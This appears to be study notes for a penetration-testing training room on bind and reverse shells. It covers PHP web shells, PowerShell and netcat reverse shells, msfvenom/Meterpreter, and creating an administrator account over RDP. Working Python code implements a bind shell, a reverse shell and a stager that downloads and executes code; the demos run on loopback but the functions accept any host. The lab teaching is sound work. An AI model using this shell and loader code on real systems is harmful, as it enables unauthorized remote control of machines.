In this video walk-through, we covered the different types of bind and reverse shells on Windows and Linux for the purpose of penetration testing training.

Introduction to Reverse Shells

In the simplest possible terms, shells are what we use when interfacing with a command-line interface (CLI). In other words, the common bash or sh programs on Linux are examples of shells, as are cmd.exe and PowerShell on Windows. When targeting remote systems it is sometimes possible to force an application running on the server (a web server, for example) to execute arbitrary code. When this happens, we want to use that initial code execution to obtain a shell running on the target.

Reverse Shell Study Notes

In simple terms, we can force the remote server either to connect back to our machine and hand us command-line access (a reverse shell), or to open a listening port on the server that we then connect to in order to execute further commands (a bind shell).

We will be covering both of these scenarios in further detail throughout the room.

The format of this room is as follows:

  • The bulk of the room is made up of information, with examples given in code blocks and screenshots.
  • There are two VMs — one Linux, one Windows — in the last two tasks of the room. These can be used to practice the techniques demonstrated.
  • There are example practice questions in Task 13. Feel free to work through these, or follow along with the tasks as you complete them.

Web Shells (Reverse Web Shell)

The first scenario involves creating a simple PHP web shell and uploading it to a Windows server. Once uploaded, the shell is accessed via a web browser, and commands are executed remotely by passing them in a cmd parameter. A web shell of this kind is non-interactive: each request runs a single command and returns its output in the HTTP response, so it is used as a stepping stone rather than as the final shell. The video demonstrates how to create the web shell, upload it to the target server, set up a listener with netcat on the attacking machine, and use the web shell to launch a payload that connects back to that listener.

Windows Reverse Shell with PowerShell

The reverse shell is obtained by using PowerShell on the target Windows machine to connect back to the attacker's machine.

A listener is set up with nc -lvp 4545 on the attacker's machine, and the PowerShell reverse-shell payload is sent through the web shell's cmd parameter from the browser. Once the connection is established, the attacker can execute commands such as whoami to confirm control over the system.

Privilege Escalation

The video explains how to move from a non-interactive reverse shell to a fully-fledged session that allows for more comfortable command execution. A new user is created with the net user command, added to the local Administrators group, and then used to connect over RDP, which gives a full interactive desktop instead of a bare reverse shell. Note that creating a user and adding it to Administrators only works if the shell already runs with administrative privileges; what this step gains is a stable, interactive session rather than higher privileges.

Netcat and Socat Shells

The video covers both netcat and socat shells, demonstrating how to set up reverse and bind shells using each tool. Netcat is easier to use and is installed by default on most Linux systems, while socat can provide more stable, fully interactive shells but has a more complex syntax and usually has to be brought onto the target as a standalone binary. Commands for reverse and bind shells are demonstrated using both tools.
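The difference between the two shell types in the sections above is simply who listens and who connects. The following is an added example, not code from the video or the TryHackMe room: a minimal bind shell and reverse shell in Python over the loopback address, with the attacker side standing in for netcat. It assumes a Unix host with /bin/sh and an OS-chosen free port; the "$ " prompt sent after each command is a convention chosen here so the operator knows when output has ended. It also shows why this kind of shell is called non-interactive: each command runs in a fresh /bin/sh, so state such as the working directory is lost between commands.

```python
import os
import socket
import subprocess
import threading

# Convention chosen for this example (not part of netcat or the page): the target sends this
# prompt after each command's output so the operator can tell when the command has finished.
PROMPT = b"$ "


def run_command(cmd: str) -> bytes:
    """Run one command line through /bin/sh and return combined stdout and stderr."""
    result = subprocess.run(cmd, shell=True, capture_output=True, timeout=30)
    return result.stdout + result.stderr


def serve_commands(conn: socket.socket) -> None:
    """Command loop shared by both shell types. Each line runs in a fresh /bin/sh, so this is the
    non-interactive shell the text describes: no terminal, no state kept between commands, and
    anything that prompts for input would hang."""
    with conn, conn.makefile("rb") as reader:
        for line in reader:
            cmd = line.decode(errors="replace").strip()
            if cmd == "exit":
                break
            conn.sendall(run_command(cmd) + PROMPT)


def listen_on(port: int = 0) -> socket.socket:
    """Listening socket on loopback; port 0 lets the OS pick a free port (a demo assumption)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    return srv


def target_bind_shell(port: int = 0) -> int:
    """Bind shell, target side: open a listening port and serve whoever connects."""
    srv = listen_on(port)

    def accept_one() -> None:
        conn, _ = srv.accept()
        srv.close()
        serve_commands(conn)

    threading.Thread(target=accept_one, daemon=True).start()
    return srv.getsockname()[1]


def target_reverse_shell(attacker_host: str, attacker_port: int) -> None:
    """Reverse shell, target side: connect back to a listener the attacker started first."""
    def connect_back() -> None:
        serve_commands(socket.create_connection((attacker_host, attacker_port)))

    threading.Thread(target=connect_back, daemon=True).start()


def send_command(conn: socket.socket, cmd: str) -> bytes:
    """Attacker side, what typing at the netcat prompt does: send a line, read to the prompt."""
    conn.sendall(cmd.encode() + b"\n")
    buf = b""
    while not buf.endswith(PROMPT):
        chunk = conn.recv(4096)
        if not chunk:
            raise ConnectionError("target closed the shell")
        buf += chunk
    return buf[: -len(PROMPT)]


def demo_bind_shell() -> bytes:
    """Target listens first; the attacker then connects, as with `nc <target> <port>`."""
    conn = socket.create_connection(("127.0.0.1", target_bind_shell()))
    try:
        return send_command(conn, "echo bind shell ok")
    finally:
        conn.sendall(b"exit\n")
        conn.close()


def demo_reverse_shell() -> bytes:
    """Attacker listens first, as with `nc -lvnp <port>`; the target then connects back."""
    listener = listen_on()
    target_reverse_shell("127.0.0.1", listener.getsockname()[1])
    conn, _ = listener.accept()
    listener.close()
    try:
        return send_command(conn, "echo reverse shell ok")
    finally:
        conn.sendall(b"exit\n")
        conn.close()


def demo_state_not_kept() -> tuple:
    """`cd` in one command does not carry into the next. Returns (output of 'cd / && pwd -P',
    True if a following 'pwd -P' still reports this process's own working directory)."""
    conn = socket.create_connection(("127.0.0.1", target_bind_shell()))
    try:
        first = send_command(conn, "cd / && pwd -P")
        second = send_command(conn, "pwd -P")
        return first, second == os.getcwd().encode() + b"\n"
    finally:
        conn.sendall(b"exit\n")
        conn.close()
```

The two demo functions differ only in ordering: for the bind shell the target's listen() must happen before the attacker connects, and for the reverse shell the attacker's listener must be up before the payload fires, which is why a reverse-shell payload launched before the netcat listener is running simply fails to connect.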

Metasploit Meterpreter Shell

The MSFVenom tool is used to create a 64-bit Windows reverse shell payload, which is then uploaded to the target machine.

The exploit/multi/handler module in Metasploit is used to catch the reverse connection. Once the connection is established, the Meterpreter session allows for various advanced interactions with the target, such as privilege escalation and system manipulation.

Staged vs. Stageless Shells

The video explains the difference between staged and stageless shells.

A staged payload is delivered in two parts: a small stager that connects to the handler and downloads the much larger stage, which is then executed in memory. Keeping the initial payload small helps where size is constrained and can help with evasion, but the stager needs a listener that knows how to deliver the stage, normally Metasploit's multi/handler. A stageless payload contains the entire shell in one go and needs nothing further from the listener, so a stageless shell payload can be caught with a plain netcat listener. In msfvenom payload names, a slash before the final component (meterpreter/reverse_tcp) marks a staged payload and an underscore (meterpreter_reverse_tcp) marks a stageless one. A stageless shell is created using MSFVenom and demonstrated with a netcat listener.
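To make the staged versus stageless distinction concrete, here is an added example in Python; it is not part of the original page or of Metasploit. It contains a handler that serves a stage the way a staged reverse_tcp handler does (a 4-byte little-endian length, then the stage bytes), a stager that fetches and runs it, and a stageless variant that already carries the stage. The stage is constructed for the example (Python source standing in for machine code, padded to over 2 MiB), and the loopback address and OS-chosen port are assumptions. The recv_exact loop is the part worth noting: TCP gives no guarantee that a single recv() returns the whole stage.

```python
import socket
import struct
import threading

# Constructed stand-in for the second stage. In the real thing this is machine code sent by the
# handler; here it is Python source defining main(), padded with a large comment so that it is
# far bigger than a single recv() is likely to return. Not the page's payload.
STAGE = (
    b"def main():\n"
    b"    return 'second stage executed'\n"
    b"# " + b"A" * (2 * 1024 * 1024) + b"\n"
)


def run_stage(stage: bytes) -> str:
    """Stand-in for jumping into the received code: compile the stage and call its entry point."""
    namespace: dict = {}
    exec(stage.decode(), namespace)
    return namespace["main"]()


def stageless_payload(embedded_stage: bytes = STAGE) -> str:
    """Stageless: the whole payload is already inside what msfvenom produced, so it runs without
    fetching anything first. That is why a stageless shell payload works with a plain netcat
    listener: there is no stage for the listener to hand over."""
    return run_stage(embedded_stage)


def handler_serve_stage(stage: bytes, port: int = 0) -> int:
    """Handler side for a staged payload (the job multi/handler does): accept the stager's
    connection, send the stage length as a 4-byte little-endian integer, then the stage."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)

    def serve() -> None:
        conn, _ = srv.accept()
        srv.close()
        with conn:
            conn.sendall(struct.pack("<I", len(stage)) + stage)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """TCP is a byte stream: recv(n) may return fewer than n bytes, so loop until the whole
    stage has arrived. A stager that did a single recv() would execute a truncated stage."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError(f"handler closed after {len(buf)} of {n} bytes")
        buf += chunk
    return bytes(buf)


def staged_payload(handler_host: str, handler_port: int) -> tuple:
    """The stager: small, knows only where to connect, and can do nothing until the handler
    sends the stage. Returns (result of running the stage, number of stage bytes received)."""
    with socket.create_connection((handler_host, handler_port)) as sock:
        (length,) = struct.unpack("<I", recv_exact(sock, 4))
        stage = recv_exact(sock, length)
    return run_stage(stage), len(stage)


def demo_staged() -> tuple:
    """Staged delivery end to end over loopback: handler first, then the stager connects back."""
    port = handler_serve_stage(STAGE)
    return staged_payload("127.0.0.1", port)
```

Point a staged payload at a listener that does not speak this exchange (netcat, for instance) and the stager sits waiting for a length that never arrives, which is the practical reason staged payloads are paired with multi/handler while a stageless shell payload can be caught with netcat.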

Linux Reverse Shells

While the video mainly focuses on Windows, it briefly mentions that the same techniques can be applied to Linux.

The user is encouraged to follow the same process for Linux, using PHP web shells, socat, netcat, and MSFVenom, changing the target platform from Windows to Linux.
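On Linux, the counterpart of the shell-upgrade step described under Privilege Escalation is giving the remote shell a terminal. The usual technique is python3 -c 'import pty; pty.spawn("/bin/bash")' followed by stty settings, and the following added example (not from the page or the room) shows in Python what that changes: the same probe run the way a netcat shell runs commands (no terminal) and then inside a pseudo-terminal, plus the window-size setting that stty rows/cols performs. The probes use the Python interpreter instead of tty(1) and stty(1) so the example does not depend on those being installed; the row and column values are arbitrary.

```python
import fcntl
import os
import pty
import struct
import subprocess
import sys
import termios

# Constructed probes (using the Python interpreter so the example does not depend on tty(1)
# or stty(1)); in a real session you would type `tty` and `stty size` instead.
PROBE_TTY = [sys.executable, "-c",
             "import sys; print('tty' if sys.stdin.isatty() else 'notty')"]
PROBE_SIZE = [sys.executable, "-c",
              "import os; s = os.get_terminal_size(0); print(s.lines, s.columns)"]


def probe_over_pipe() -> str:
    """How a command runs inside a netcat or socat shell: stdin/stdout are a socket or pipe and
    there is no terminal. Anything that calls isatty() (sudo, su, ssh, editors) sees this."""
    result = subprocess.run(PROBE_TTY, stdin=subprocess.DEVNULL, capture_output=True)
    return result.stdout.decode().strip()


def run_in_pty(argv: list, rows: int = 24, cols: int = 80) -> str:
    """Run argv with a pseudo-terminal as its stdin/stdout/stderr, the way
    python3 -c 'import pty; pty.spawn("/bin/bash")' re-hosts a shell, and return its output.

    The window size is a property of the pty, not of the remote process, which is why after
    an upgrade you still tell the remote side the real size with `stty rows <n> cols <m>`.
    """
    master, slave = pty.openpty()
    fcntl.ioctl(master, termios.TIOCSWINSZ, struct.pack("HHHH", rows, cols, 0, 0))
    proc = subprocess.Popen(argv, stdin=slave, stdout=slave, stderr=slave)
    os.close(slave)                      # only the child holds the slave end now
    output = b""
    while True:
        try:
            chunk = os.read(master, 4096)
        except OSError:                  # Linux reports EIO once the child closed the slave
            break
        if not chunk:
            break
        output += chunk
    proc.wait()
    os.close(master)
    # The pty line discipline turns "\n" into "\r\n"; strip() removes it for comparison.
    return output.decode().strip()


def probe_over_pty() -> str:
    """The same probe as probe_over_pipe(), now with a terminal attached."""
    return run_in_pty(PROBE_TTY)


def terminal_size_in_pty(rows: int, cols: int) -> str:
    """What the remote shell sees after the equivalent of `stty rows <rows> cols <cols>`."""
    return run_in_pty(PROBE_SIZE, rows, cols)
```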

Room Answers | TryHackMe What the Shell?

Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?

You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)

When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?

Which option tells netcat to listen?

How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?

How would you change your terminal size to have 238 columns?

What is the syntax for setting up a Python3 webserver on port 80?

How would we get socat to listen on TCP port 8080?

What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called “encrypt.pem”

If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?

What command can be used to create a named pipe in Linux?

Which symbol is used to show that a shell is stageless?

What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell

What command can be used to start a listener in the background?

If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?

Video Walkthrough | TryHackMe What the Shell

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
